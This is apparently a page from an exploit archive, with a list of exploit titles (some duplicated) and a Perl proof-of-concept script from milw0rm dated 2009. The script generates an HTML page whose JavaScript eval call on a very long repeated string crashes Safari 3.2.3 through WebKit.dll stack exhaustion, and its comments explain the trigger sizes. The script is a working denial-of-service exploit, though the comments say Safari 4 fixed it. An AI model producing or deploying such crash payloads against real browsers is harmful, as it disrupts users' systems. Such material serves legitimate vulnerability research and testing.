477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
34 lines
1.7 KiB
Raku
Executable file
34 lines
1.7 KiB
Raku
Executable file
#!/usr/bin/perl
|
|
# letsgosurfinnowonsafari.pl
|
|
# AKA
|
|
# Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit
|
|
#
|
|
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009
|
|
#
|
|
# *********************************************************************************************************
|
|
# Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating
|
|
# 21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow"
|
|
# exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times
|
|
# (43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the
|
|
# WebKit layout engine (www.webkit.org).
|
|
|
|
# This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4
|
|
# (4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for
|
|
# quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty
|
|
# much means that the stack for the process has been exhausted and its maximum size has been reached.
|
|
# *********************************************************************************************************
|
|
# letsgosurfinnowonsafari.pl
|
|
|
|
$fn = 'letsgosurfinnowwithsafari.html';
|
|
$size = 21526; # "Stack Overflow" WebKit.dll
|
|
#$size = 21697; # "Access Violation" WebKit.dll
|
|
|
|
$payload = '<html><script type="text/javascript">' . "\n";
|
|
$payload = $payload . 'eval("' . "A/" x $size . '");' . "\n";
|
|
$payload = $payload . '</script></html>';
|
|
|
|
open(FD, '>' . $fn);
|
|
print FD $payload;
|
|
close(FD);
|
|
|
|
# milw0rm.com [2009-09-09]
|